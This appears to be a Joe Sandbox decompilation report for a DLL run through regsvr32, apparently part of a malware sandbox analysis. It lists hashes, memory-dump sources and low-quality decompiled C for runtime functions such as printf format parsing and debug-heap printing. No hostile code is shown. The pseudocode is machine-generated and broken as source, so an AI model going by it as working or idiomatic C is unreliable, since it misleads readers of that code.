                                                                                • Opcode Fuzzy Hash: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                                • Instruction Fuzzy Hash: 2051E9B291C6C6CAE7748B14E8403BAB7F0FB86345F488135D6AD8699CDBACE441DF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 27%
                                                                                			E00007FFA7FFA5247BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                				void* _t171;
                                                                                				char* _t191;
                                                                                				char* _t192;
                                                                                
                                                                                				_a968 = _a696 & 0x000000ff;
                                                                                				if (_a968 == 0x20) goto 0x5247bd57;
                                                                                				if (_a968 == 0x23) goto 0x5247bd64;
                                                                                				if (_a968 == 0x2b) goto 0x5247bd4a;
                                                                                				if (_a968 == 0x2d) goto 0x5247bd3d;
                                                                                				if (_a968 == 0x30) goto 0x5247bd72;
                                                                                				goto 0x5247bd7d;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				goto 0x5247bd7d;
                                                                                				_a80 = _a80 | 0x00000001;
                                                                                				goto 0x5247bd7d;
                                                                                				_a80 = _a80 | 0x00000002;
                                                                                				goto 0x5247bd7d;
                                                                                				asm("bts eax, 0x7");
                                                                                				goto 0x5247bd7d;
                                                                                				_a80 = _a80 | 0x00000008;
                                                                                				if (_a696 != 0x2a) goto 0x5247bdbe;
                                                                                				_t191 =  &_a1112;
                                                                                				_a88 = E00007FFA7FFA52471E40(_t191);
                                                                                				if (_a88 >= 0) goto 0x5247bdbc;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				_a88 =  ~_a88;
                                                                                				goto 0x5247bdd5;
                                                                                				_a88 = _t171 + _t191 - 0x30;
                                                                                				_a116 = 0;
                                                                                				if (_a696 != 0x2a) goto 0x5247be16;
                                                                                				_t192 =  &_a1112;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t192);
                                                                                				if (_a116 >= 0) goto 0x5247be14;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247be2d;
                                                                                				_a116 = _t171 + _t192 - 0x30;
                                                                                				_a972 = _a696 & 0x000000ff;
                                                                                				if (_a972 == 0x49) goto 0x5247beb7;
                                                                                				if (_a972 == 0x68) goto 0x5247bfc0;
                                                                                				if (_a972 == 0x6c) goto 0x5247be76;
                                                                                				if (_a972 == 0x77) goto 0x5247bfcd;
                                                                                				goto 0x5247bfd9;
                                                                                				if ( *_a1096 != 0x6c) goto 0x5247bea7;
                                                                                				_a1096 = _a1096 + 1;
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247beb2;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xf");
                                                                                				if ( *_a1096 != 0x36) goto 0x5247bf09;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 != 0x33) goto 0x5247bf4c;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 == 0x64) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x69) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x6f) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x75) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x78) goto 0x5247bfac;
                                                                                				if ( *_a1096 != 0x58) goto 0x5247bfae;
                                                                                				goto 0x5247bfbe;
                                                                                				_a704 = 0;
                                                                                				goto E00007FFA7FFA5247BB66;
                                                                                				goto 0x5247bfd9;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a976 = _a696;
                                                                                				_a976 = _a976 - 0x41;
                                                                                				if (_a976 - 0x37 > 0) goto 0x5247ca31;
                                                                                				goto __rax;
                                                                                			}







                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 530996419-4087627031
                                                                                • Opcode ID: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                                • Instruction ID: 819965b6c29b623576735f5af2eb6270283dc6395ef7b18d13e33910ba69aead
                                                                                • Opcode Fuzzy Hash: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                                • Instruction Fuzzy Hash: F2514C6290C6C69AE3B19B14E8543BEB7F4EB86344F0C4135D6AD8699EDBACE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 26%
                                                                                			E00007FFA7FFA5247DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                				void* _t139;
                                                                                				char* _t159;
                                                                                				char* _t160;
                                                                                
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247dd6c;
                                                                                				_t159 =  &_a1560;
                                                                                				_a88 = E00007FFA7FFA52471E40(_t159);
                                                                                				if (_a88 >= 0) goto 0x5247dd6a;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				_a88 =  ~_a88;
                                                                                				goto 0x5247dd83;
                                                                                				_a88 = _t139 + _t159 - 0x30;
                                                                                				_a116 = 0;
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
                                                                                				_t160 =  &_a1560;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t160);
                                                                                				if (_a116 >= 0) goto 0x5247ddc2;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247dddb;
                                                                                				_a116 = _t139 + _t160 - 0x30;
                                                                                				_a1408 = _a1208 & 0x0000ffff;
                                                                                				if (_a1408 == 0x49) goto 0x5247de66;
                                                                                				if (_a1408 == 0x68) goto 0x5247df6f;
                                                                                				if (_a1408 == 0x6c) goto 0x5247de24;
                                                                                				if (_a1408 == 0x77) goto 0x5247df7c;
                                                                                				goto 0x5247df88;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
                                                                                				_a1544 =  &(_a1544[1]);
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247de61;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xf");
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
                                                                                				goto 0x5247df6d;
                                                                                				_a1216 = 0;
                                                                                				goto E00007FFA7FFA5247DC41;
                                                                                				goto 0x5247df88;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a1412 = _a1208 & 0x0000ffff;
                                                                                				_a1412 = _a1412 - 0x41;
                                                                                				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
                                                                                				goto __rax;
                                                                                			}







                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2576288505-734865713
                                                                                • Opcode ID: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                                • Instruction ID: 5dd2c0767ca1b38129e643210283da30da86b705739990ed4327bf3dcb913912
                                                                                • Opcode Fuzzy Hash: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                                • Instruction Fuzzy Hash: DA51FAB291C6C6CAE7708B14E8403BAB7E0FB86345F488135E69D87999DBACE441CF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 26%
                                                                                			E00007FFA7FFA5247BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                				void* _t139;
                                                                                				char* _t159;
                                                                                				char* _t160;
                                                                                
                                                                                				if (_a696 != 0x2a) goto 0x5247bdbe;
                                                                                				_t159 =  &_a1112;
                                                                                				_a88 = E00007FFA7FFA52471E40(_t159);
                                                                                				if (_a88 >= 0) goto 0x5247bdbc;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				_a88 =  ~_a88;
                                                                                				goto 0x5247bdd5;
                                                                                				_a88 = _t139 + _t159 - 0x30;
                                                                                				_a116 = 0;
                                                                                				if (_a696 != 0x2a) goto 0x5247be16;
                                                                                				_t160 =  &_a1112;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t160);
                                                                                				if (_a116 >= 0) goto 0x5247be14;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247be2d;
                                                                                				_a116 = _t139 + _t160 - 0x30;
                                                                                				_a972 = _a696 & 0x000000ff;
                                                                                				if (_a972 == 0x49) goto 0x5247beb7;
                                                                                				if (_a972 == 0x68) goto 0x5247bfc0;
                                                                                				if (_a972 == 0x6c) goto 0x5247be76;
                                                                                				if (_a972 == 0x77) goto 0x5247bfcd;
                                                                                				goto 0x5247bfd9;
                                                                                				if ( *_a1096 != 0x6c) goto 0x5247bea7;
                                                                                				_a1096 = _a1096 + 1;
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247beb2;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xf");
                                                                                				if ( *_a1096 != 0x36) goto 0x5247bf09;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 != 0x33) goto 0x5247bf4c;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 == 0x64) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x69) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x6f) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x75) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x78) goto 0x5247bfac;
                                                                                				if ( *_a1096 != 0x58) goto 0x5247bfae;
                                                                                				goto 0x5247bfbe;
                                                                                				_a704 = 0;
                                                                                				goto E00007FFA7FFA5247BB66;
                                                                                				goto 0x5247bfd9;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a976 = _a696;
                                                                                				_a976 = _a976 - 0x41;
                                                                                				if (_a976 - 0x37 > 0) goto 0x5247ca31;
                                                                                				goto __rax;
                                                                                			}







                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2576288505-192189897
                                                                                • Opcode ID: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                                • Instruction ID: c8fe72fa0d4ac2bd902c75eb0594ee4d04f01b629bd9cf40f0fc20d5498a9b5e
                                                                                • Opcode Fuzzy Hash: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                                • Instruction Fuzzy Hash: 4E511B6290C6C68AE770DB20E8943BEB7F4E786344F484135D6AD8699EDBACE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00007FFA7FFA5247DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                				void* _t113;
                                                                                				char* _t133;
                                                                                
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
                                                                                				_t133 =  &_a1560;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t133);
                                                                                				if (_a116 >= 0) goto 0x5247ddc2;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247dddb;
                                                                                				_a116 = _t113 + _t133 - 0x30;
                                                                                				_a1408 = _a1208 & 0x0000ffff;
                                                                                				if (_a1408 == 0x49) goto 0x5247de66;
                                                                                				if (_a1408 == 0x68) goto 0x5247df6f;
                                                                                				if (_a1408 == 0x6c) goto 0x5247de24;
                                                                                				if (_a1408 == 0x77) goto 0x5247df7c;
                                                                                				goto 0x5247df88;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
                                                                                				_a1544 =  &(_a1544[1]);
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247de61;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xf");
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
                                                                                				goto 0x5247df6d;
                                                                                				_a1216 = 0;
                                                                                				goto E00007FFA7FFA5247DC41;
                                                                                				goto 0x5247df88;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a1412 = _a1208 & 0x0000ffff;
                                                                                				_a1412 = _a1412 - 0x41;
                                                                                				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
                                                                                				goto __rax;
                                                                                			}






                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2576288505-734865713
                                                                                • Opcode ID: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                                • Instruction ID: c3d4481eda0d78e9bf4ca24cecce4ba62a8f039801a69b54a4e3a7884d9e3760
                                                                                • Opcode Fuzzy Hash: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                                • Instruction Fuzzy Hash: 30411D6291C686CAE7708B24E8403BA76F0FB86745F488135D6AD86599DFBCD441CF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00007FFA7FFA5247BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                				void* _t113;
                                                                                				char* _t133;
                                                                                
                                                                                				if (_a696 != 0x2a) goto 0x5247be16;
                                                                                				_t133 =  &_a1112;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t133);
                                                                                				if (_a116 >= 0) goto 0x5247be14;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247be2d;
                                                                                				_a116 = _t113 + _t133 - 0x30;
                                                                                				_a972 = _a696 & 0x000000ff;
                                                                                				if (_a972 == 0x49) goto 0x5247beb7;
                                                                                				if (_a972 == 0x68) goto 0x5247bfc0;
                                                                                				if (_a972 == 0x6c) goto 0x5247be76;
                                                                                				if (_a972 == 0x77) goto 0x5247bfcd;
                                                                                				goto 0x5247bfd9;
                                                                                				if ( *_a1096 != 0x6c) goto 0x5247bea7;
                                                                                				_a1096 = _a1096 + 1;
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247beb2;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xf");
                                                                                				if ( *_a1096 != 0x36) goto 0x5247bf09;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 != 0x33) goto 0x5247bf4c;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 == 0x64) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x69) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x6f) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x75) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x78) goto 0x5247bfac;
                                                                                				if ( *_a1096 != 0x58) goto 0x5247bfae;
                                                                                				goto 0x5247bfbe;
                                                                                				_a704 = 0;
                                                                                				goto E00007FFA7FFA5247BB66;
                                                                                				goto 0x5247bfd9;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a976 = _a696;
                                                                                				_a976 = _a976 - 0x41;
                                                                                				if (_a976 - 0x37 > 0) goto 0x5247ca31;
                                                                                				goto __rax;
                                                                                			}






                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2576288505-192189897
                                                                                • Opcode ID: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                                • Instruction ID: a05fe08ed8a31b0af60af610ef72503ba2111a3081301dfb2c680f9e25707f87
                                                                                • Opcode Fuzzy Hash: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                                • Instruction Fuzzy Hash: 4D415F6290C6C68AE3709B24E8543BEB7F4E786704F484135D6AD86A9EDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_oneof_swprintf_p
                                                                                • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                • API String ID: 2731067127-3604075083
                                                                                • Opcode ID: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                                • Instruction ID: cb85e8c0f6a241fe7ffb1120b9e5c262712918a8f5b993ca300c5df1b697a948
                                                                                • Opcode Fuzzy Hash: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                                • Instruction Fuzzy Hash: 6741187260D6C186E7249B51E8507AABBB1FB96740F548136EA8D47B8DDFBCE404CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 41%
                                                                                			E00007FFA7FFA52474F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
                                                                                				void* _v16;
                                                                                				long long _v24;
                                                                                				long long _v32;
                                                                                				long long _v40;
                                                                                				long long _v48;
                                                                                				void* _v56;
                                                                                				signed int _v72;
                                                                                				long long _v80;
                                                                                				signed int _v88;
                                                                                				void* _t88;
                                                                                				void* _t89;
                                                                                				void* _t90;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                				void* _t101;
                                                                                				long long _t113;
                                                                                				intOrPtr _t116;
                                                                                				void* _t117;
                                                                                				long long _t118;
                                                                                				long long _t121;
                                                                                				long long _t122;
                                                                                				long long _t125;
                                                                                				void* _t164;
                                                                                
                                                                                				_t113 = __rax;
                                                                                				_a32 = r9d;
                                                                                				_a24 = __r8;
                                                                                				_a16 = __rdx;
                                                                                				_a8 = __rcx;
                                                                                				_v88 = E00007FFA7FFA52473B70(_a8, _a16, _a24);
                                                                                				E00007FFA7FFA5246E680(_t79, _t113);
                                                                                				_v80 = _t113;
                                                                                				0x52464000();
                                                                                				_v56 = _t113 + 0x100;
                                                                                				 *_v56 =  *_v56 + 1;
                                                                                				if (_v88 == 0xffffffff) goto 0x52475103;
                                                                                				if (_v88 - _a32 <= 0) goto 0x52475103;
                                                                                				if (_v88 - 0xffffffff <= 0) goto 0x52474fb9;
                                                                                				_t116 = _a24;
                                                                                				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0x52474fb9;
                                                                                				goto 0x52474fbe;
                                                                                				E00007FFA7FFA5246E680(E00007FFA7FFA5246CF80(_t116), _t116);
                                                                                				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
                                                                                				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
                                                                                				_t88 = E00007FFA7FFA5246E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
                                                                                				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
                                                                                				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0x52475038;
                                                                                				_t89 = E00007FFA7FFA5246E680(_t88, _t118);
                                                                                				_v48 = _t118;
                                                                                				_t90 = E00007FFA7FFA5246E680(_t89, _t118);
                                                                                				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                                                				_v40 = _t121;
                                                                                				goto 0x52475041;
                                                                                				_v40 = 0;
                                                                                				if (_v40 == 0) goto 0x524750f4;
                                                                                				r9d = _v72;
                                                                                				_t92 = E00007FFA7FFA5246E680(E00007FFA7FFA52473BD0(_t90, _a8, _a16, _a24), _t121);
                                                                                				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
                                                                                				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0x524750c9;
                                                                                				_t93 = E00007FFA7FFA5246E680(_t92, _t122);
                                                                                				_v32 = _t122;
                                                                                				E00007FFA7FFA5246E680(_t93, _t122);
                                                                                				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                                                				_v24 = _t125;
                                                                                				goto 0x524750d2;
                                                                                				_v24 = 0;
                                                                                				r8d = 0x103;
                                                                                				E00007FFA7FFA5246E6C0(E00007FFA7FFA5247D7E0(_v24, _a8, _t164), _t125, _v80);
                                                                                				goto 0x524750f6;
                                                                                				_v88 = _v72;
                                                                                				goto 0x52474f83;
                                                                                				0x52464000();
                                                                                				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0x52475131;
                                                                                				0x52464000();
                                                                                				_v16 = _t125 + 0x100;
                                                                                				 *_v16 =  *_v16 - 1;
                                                                                				if (_v88 == 0xffffffff) goto 0x5247514a;
                                                                                				if (_v88 - _a32 <= 0) goto 0x5247514a;
